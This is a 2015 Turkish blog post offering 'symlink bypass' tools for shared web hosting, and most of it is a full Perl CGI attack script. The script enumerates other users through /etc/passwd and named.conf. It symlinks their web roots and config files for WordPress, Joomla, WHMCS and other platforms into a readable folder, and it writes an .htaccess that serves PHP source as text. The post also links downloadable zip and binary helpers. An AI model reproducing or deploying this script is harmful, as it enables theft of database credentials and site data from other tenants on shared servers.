Symlink Bypass Tools And Methods
Perl CGI Symlink
Recommend as disable_functions and safe_mode only affects PHP
Sym.pl:
PHP Code:
[code]#!/usr/bin/perl -I/usr/local/bandmin
local ($buffer, @pairs, $pair, $name, $value, %FORM);
# Read in text
$ENV{'REQUEST_METHOD'} =~ tr/a-z/A-Z/;
if ($ENV{'REQUEST_METHOD'} eq "GET")
{
$buffer = $ENV{'QUERY_STRING'};
}
# Split information into name/value pairs
@pairs = split(/&/, $buffer);
foreach $pair (@pairs)
{
($name, $value) = split(/=/, $pair);
$value =~ tr/+/ /;
$value =~ s/%(..)/pack("C", hex($1))/eg;
$FORM{$name} = $value;
}
$what = $FORM{what};
print "Content-type: text/html\n\n";
print'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<http-equiv="Content-Language" content="en-us" />
<http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title></title>
</head>
<body bgcolor="#000000" text="Lime">
<table align=center><tr><td><form><input type=hidden name="what" value="ln"><input type="submit" value="Using Ln -s" class=but></form></td>
<td><form><input type=hidden name="what" value="symlink"><input type="submit" value="Using symlink()" class=but></form></td>
<td><form><input type=hidden name="what" value="config"><input type="submit" value="Config Using symlink()" class=but></form></td></tr></table>';
sub getsym
{
symlink('/home/'.$_[0].'/public_html/vb/includes/config.php',$_[1].'-Vbulletin.txt');
symlink('/home/'.$_[0].'/public_html/vb/core/includes/config.php',$_[1].'-Vbulletin.txt');
symlink('/home/'.$_[0].'/public_html/includes/config.php',$_[1].'-Vbulletin.txt');
symlink('/home/'.$_[0].'/public_html/core/includes/config.php',$_[1].'-Vbulletin.txt');
symlink('/home/'.$_[0].'/public_html/forum/includes/config.php',$_[1].'-Vbulletin.txt');
symlink('/home/'.$_[0].'/public_html/core/forum/includes/config.php',$_[1].'-Vbulletin.txt');
symlink('/home/'.$_[0].'/public_html/forums/includes/config.php',$_[1].'-Vbulletin.txt');
symlink('/home/'.$_[0].'/public_html/core/forums/includes/config.php',$_[1].'-Vbulletin.txt');
symlink('/home/'.$_[0].'/public_html/cc/includes/config.php',$_[1].'-Vbulletin.txt');
symlink('/home/'.$_[0].'/public_html/cc/core/includes/config.php',$_[1].'-Vbulletin.txt');
symlink('/home/'.$_[0].'/public_html/inc/config.php',$_[1].'-MyBB.txt');
symlink('/home/'.$_[0].'/public_html/includes/configure.php',$_[1].'-OsCommerce.txt');
symlink('/home/'.$_[0].'/public_html/shop/includes/configure.php',$_[1].'-OsCommerce.txt');
symlink('/home/'.$_[0].'/public_html/os/includes/configure.php',$_[1].'-OsCommerce.txt');
symlink('/home/'.$_[0].'/public_html/oscom/includes/configure.php',$_[1].'-OsCommerce.txt');
symlink('/home/'.$_[0].'/public_html/products/includes/configure.php',$_[1].'-OsCommerce.txt');
symlink('/home/'.$_[0].'/public_html/cart/includes/configure.php',$_[1].'-OsCommerce.txt');
symlink('/home/'.$_[0].'/public_html/inc/conf_global.php',$_[1].'-IPB.txt');
symlink('/home/'.$_[0].'/public_html/wp-config.php',$_[1].'-Wordpress.txt');
symlink('/home/'.$_[0].'/public_html/wp/test/wp-config.php',$_[1].'-Wordpress.txt');
symlink('/home/'.$_[0].'/public_html/blog/wp-config.php',$_[1].'-Wordpress.txt');
symlink('/home/'.$_[0].'/public_html/beta/wp-config.php',$_[1].'-Wordpress.txt');
symlink('/home/'.$_[0].'/public_html/portal/wp-config.php',$_[1].'-Wordpress.txt');
symlink('/home/'.$_[0].'/public_html/site/wp-config.php',$_[1].'-Wordpress.txt');
symlink('/home/'.$_[0].'/public_html/wp/wp-config.php',$_[1].'-Wordpress.txt');
symlink('/home/'.$_[0].'/public_html/WP/wp-config.php',$_[1].'-Wordpress.txt');
symlink('/home/'.$_[0].'/public_html/news/wp-config.php',$_[1].'-Wordpress.txt');
symlink('/home/'.$_[0].'/public_html/wordpress/wp-config.php',$_[1].'-Wordpress.txt');
symlink('/home/'.$_[0].'/public_html/test/wp-config.php',$_[1].'-Wordpress.txt');
symlink('/home/'.$_[0].'/public_html/demo/wp-config.php',$_[1].'-Wordpress.txt');
symlink('/home/'.$_[0].'/public_html/home/wp-config.php',$_[1].'-Wordpress.txt');
symlink('/home/'.$_[0].'/public_html/v1/wp-config.php',$_[1].'-Wordpress.txt');
symlink('/home/'.$_[0].'/public_html/v2/wp-config.php',$_[1].'-Wordpress.txt');
symlink('/home/'.$_[0].'/public_html/press/wp-config.php',$_[1].'-Wordpress.txt');
symlink('/home/'.$_[0].'/public_html/new/wp-config.php',$_[1].'-Wordpress.txt');
symlink('/home/'.$_[0].'/public_html/blogs/wp-config.php',$_[1].'-Wordpress.txt');
symlink('/home/'.$_[0].'/public_html/configuration.php',$_[1].'-Joomla.txt');
symlink('/home/'.$_[0].'/public_html/blog/configuration.php',$_[1].'-Joomla.txt');
symlink('/home/'.$_[0].'/public_html/submitticket.php',$_[1].'-^WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/cms/configuration.php',$_[1].'-Joomla.txt');
symlink('/home/'.$_[0].'/public_html/beta/configuration.php',$_[1].'-Joomla.txt');
symlink('/home/'.$_[0].'/public_html/portal/configuration.php',$_[1].'-Joomla.txt');
symlink('/home/'.$_[0].'/public_html/site/configuration.php',$_[1].'-Joomla.txt');
symlink('/home/'.$_[0].'/public_html/main/configuration.php',$_[1].'-Joomla.txt');
symlink('/home/'.$_[0].'/public_html/home/configuration.php',$_[1].'-Joomla.txt');
symlink('/home/'.$_[0].'/public_html/demo/configuration.php',$_[1].'-Joomla.txt');
symlink('/home/'.$_[0].'/public_html/test/configuration.php',$_[1].'-Joomla.txt');
symlink('/home/'.$_[0].'/public_html/v1/configuration.php',$_[1].'-Joomla.txt');
symlink('/home/'.$_[0].'/public_html/v2/configuration.php',$_[1].'-Joomla.txt');
symlink('/home/'.$_[0].'/public_html/joomla/configuration.php',$_[1].'-Joomla.txt');
symlink('/home/'.$_[0].'/public_html/new/configuration.php',$_[1].'-Joomla.txt');
symlink('/home/'.$_[0].'/public_html/WHMCS/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/whmcs1/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/Whmcs/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/whmcs/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/whmcs/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/WHMC/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/Whmc/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/whmc/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/WHM/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/Whm/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/whm/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/HOST/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/Host/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/host/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/SUPPORTES/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/Supportes/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/supportes/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/domains/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/domain/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/Hosting/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/HOSTING/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/hosting/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/CART/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/Cart/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/cart/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/ORDER/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/Order/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/order/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/CLIENT/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/Client/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/client/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/CLIENTAREA/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/Clientarea/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/clientarea/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/SUPPORT/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/Support/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/support/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/BILLING/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/Billing/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/billing/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/BUY/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/Buy/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/buy/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/MANAGE/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/Manage/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/manage/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/CLIENTSUPPORT/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/ClientSupport/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/Clientsupport/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/clientsupport/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/CHECKOUT/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/Checkout/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/checkout/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/BILLINGS/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/Billings/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/billings/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/BASKET/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/Basket/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/basket/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/SECURE/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/Secure/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/secure/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/SALES/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/Sales/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/sales/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/BILL/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/Bill/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/bill/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/PURCHASE/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/Purchase/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/purchase/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/ACCOUNT/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/Account/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/account/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/USER/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/User/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/user/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/CLIENTS/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/Clients/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/clients/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/BILLINGS/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/Billings/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/billings/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/MY/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/My/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/my/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/secure/whm/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/secure/whmcs/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/panel/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/clientes/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/cliente/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/support/order/configuration.php',$_[1].'-WHMCS.txt');
symlink('/home/'.$_[0].'/public_html/bb-config.php',$_[1].'-BoxBilling.txt');
symlink('/home/'.$_[0].'/public_html/boxbilling/bb-config.php',$_[1].'-BoxBilling.txt');
symlink('/home/'.$_[0].'/public_html/box/bb-config.php',$_[1].'-BoxBilling.txt');
symlink('/home/'.$_[0].'/public_html/host/bb-config.php',$_[1].'-BoxBilling.txt');
symlink('/home/'.$_[0].'/public_html/Host/bb-config.php',$_[1].'-BoxBilling.txt');
symlink('/home/'.$_[0].'/public_html/supportes/bb-config.php',$_[1].'-BoxBilling.txt');
symlink('/home/'.$_[0].'/public_html/support/bb-config.php',$_[1].'-BoxBilling.txt');
symlink('/home/'.$_[0].'/public_html/hosting/bb-config.php',$_[1].'-BoxBilling.txt');
symlink('/home/'.$_[0].'/public_html/cart/bb-config.php',$_[1].'-BoxBilling.txt');
symlink('/home/'.$_[0].'/public_html/order/bb-config.php',$_[1].'-BoxBilling.txt');
symlink('/home/'.$_[0].'/public_html/client/bb-config.php',$_[1].'-BoxBilling.txt');
symlink('/home/'.$_[0].'/public_html/clients/bb-config.php',$_[1].'-BoxBilling.txt');
symlink('/home/'.$_[0].'/public_html/cliente/bb-config.php',$_[1].'-BoxBilling.txt');
symlink('/home/'.$_[0].'/public_html/clientes/bb-config.php',$_[1].'-BoxBilling.txt');
symlink('/home/'.$_[0].'/public_html/billing/bb-config.php',$_[1].'-BoxBilling.txt');
symlink('/home/'.$_[0].'/public_html/billings/bb-config.php',$_[1].'-BoxBilling.txt');
symlink('/home/'.$_[0].'/public_html/my/bb-config.php',$_[1].'-BoxBilling.txt');
symlink('/home/'.$_[0].'/public_html/secure/bb-config.php',$_[1].'-BoxBilling.txt');
symlink('/home/'.$_[0].'/public_html/support/order/bb-config.php',$_[1].'-BoxBilling.txt');
symlink('/home/'.$_[0].'/public_html/includes/dist-configure.php',$_[1].'-Zencart.txt');
symlink('/home/'.$_[0].'/public_html/zencart/includes/dist-configure.php',$_[1].'-Zencart.txt');
symlink('/home/'.$_[0].'/public_html/products/includes/dist-configure.php',$_[1].'-Zencart.txt');
symlink('/home/'.$_[0].'/public_html/cart/includes/dist-configure.php',$_[1].'-Zencart.txt');
symlink('/home/'.$_[0].'/public_html/shop/includes/dist-configure.php',$_[1].'-Zencart.txt');
symlink('/home/'.$_[0].'/public_html/includes/iso4217.php',$_[1].'-Hostbills.txt');
symlink('/home/'.$_[0].'/public_html/hostbills/includes/iso4217.php',$_[1].'-Hostbills.txt');
symlink('/home/'.$_[0].'/public_html/host/includes/iso4217.php',$_[1].'-Hostbills.txt');
symlink('/home/'.$_[0].'/public_html/Host/includes/iso4217.php',$_[1].'-Hostbills.txt');
symlink('/home/'.$_[0].'/public_html/supportes/includes/iso4217.php',$_[1].'-Hostbills.txt');
symlink('/home/'.$_[0].'/public_html/support/includes/iso4217.php',$_[1].'-Hostbills.txt');
symlink('/home/'.$_[0].'/public_html/hosting/includes/iso4217.php',$_[1].'-Hostbills.txt');
symlink('/home/'.$_[0].'/public_html/cart/includes/iso4217.php',$_[1].'-Hostbills.txt');
symlink('/home/'.$_[0].'/public_html/order/includes/iso4217.php',$_[1].'-Hostbills.txt');
symlink('/home/'.$_[0].'/public_html/client/includes/iso4217.php',$_[1].'-Hostbills.txt');
symlink('/home/'.$_[0].'/public_html/clients/includes/iso4217.php',$_[1].'-Hostbills.txt');
symlink('/home/'.$_[0].'/public_html/cliente/includes/iso4217.php',$_[1].'-Hostbills.txt');
symlink('/home/'.$_[0].'/public_html/clientes/includes/iso4217.php',$_[1].'-Hostbills.txt');
symlink('/home/'.$_[0].'/public_html/billing/includes/iso4217.php',$_[1].'-Hostbills.txt');
symlink('/home/'.$_[0].'/public_html/billings/includes/iso4217.php',$_[1].'-Hostbills.txt');
symlink('/home/'.$_[0].'/public_html/my/includes/iso4217.php',$_[1].'-Hostbills.txt');
symlink('/home/'.$_[0].'/public_html/secure/includes/iso4217.php',$_[1].'-Hostbills.txt');
symlink('/home/'.$_[0].'/public_html/support/order/includes/iso4217.php',$_[1].'-Hostbills.txt');
}
sub chdr
{
chdir $_[0];
open(DATA, ">.htaccess");
print DATA "Options all\nDirectoryIndex Sux.html\nAddType text/plain .php\nAddHandler server-parsed .php\nAddType text/plain .html\nAddHandler txt .html\nRequire None\nSatisfy Any";
}
if($what eq "ln")
{
mkdir "server", 0755;
&chdr("server");
chdir "server";
open (d0mains, '/etc/named.conf') or $err=1;
@kr = <d0mains>;
close d0mains;
if ($err)
{
open INPUT, "</etc/passwd";
while ( <INPUT> )
{
$line=$_; @sprt=split(/:/,$line); $user=$sprt[0];
system('ln -s /home/'.$user.'/public_html ' . $user);
}
print '<center><a href=server>Click Here</a></center>';
}
else
{
foreach my $one (@kr)
{
if($one =~ m/.*?zone "(.*?)" {/)
{
$filename= "/etc/valiases/".$1;
$owner = getpwuid((stat($filename))[4]);
system('ln -s /home/'.$owner.'/public_html ' . $1);
}
}
print '<center><a href=server>Click Here</a></center>';
}
}
elsif($what eq "symlink")
{
mkdir "server", 0755;
&chdr("server");
chdir "server";
open (d0mains, '/etc/named.conf') or $err=1;
@kr = <d0mains>;
close d0mains;
if ($err)
{
open INPUT, "</etc/passwd";
while ( <INPUT> )
{
$line=$_; @sprt=split(/:/,$line); $user=$sprt[0];
symlink('/home/'.$user.'/public_html', $user);
}
print '<center><a href=server>Click Here</a></center>';
}
else
{
foreach my $one (@kr)
{
if($one =~ m/.*?zone "(.*?)" {/)
{
$filename= "/etc/valiases/".$1;
$owner = getpwuid((stat($filename))[4]);
symlink('/home/'.$owner.'/public_html', $1);
}
}
print '<center><a href=server>Click Here</a></center>';
}
}
elsif($what eq "config")
{
mkdir "config", 0755;
&chdr("config");
chdir "config";
open (d0mains, '/etc/named.conf') or $err=1;
@kr = <d0mains>;
close d0mains;
if ($err)
{
open INPUT, "</etc/passwd";
while ( <INPUT> )
{
$line=$_; @sprt=split(/:/,$line); $user=$sprt[0];
$user1 = $user;
&getsym($user,$user1);
}
print '<center><a href=config>Click Here</a></center>';
}
else
{
foreach my $one (@kr)
{
if($one =~ m/.*?zone "(.*?)" {/)
{
$filename= "/etc/valiases/".$1;
$owner = getpwuid((stat($filename))[4]);
&getsym($owner,$1);
}
}
print '<center><a href=config>Click Here</a></center>';
}
}
print '</body></html>';
[/code]
Unzip method
Simply unzip the following file and it will create a symlink to root folder
Download: http://www.sendspace.nl/61051/x.zip
ln permission denied bypass
This can be easily bypassed by uploading the ln binary file
Download: http://www.sendspace.nl/af1a7/ln.zip
14 Mayıs 2015 Perşembe
Yorum 0
Symlink Bypass Tools And Methods
06:15
Exploit, Web Server Güvenliği
Kaydol:
Kayıt Yorumları (Atom)
0 yorum:
Yorum Gönder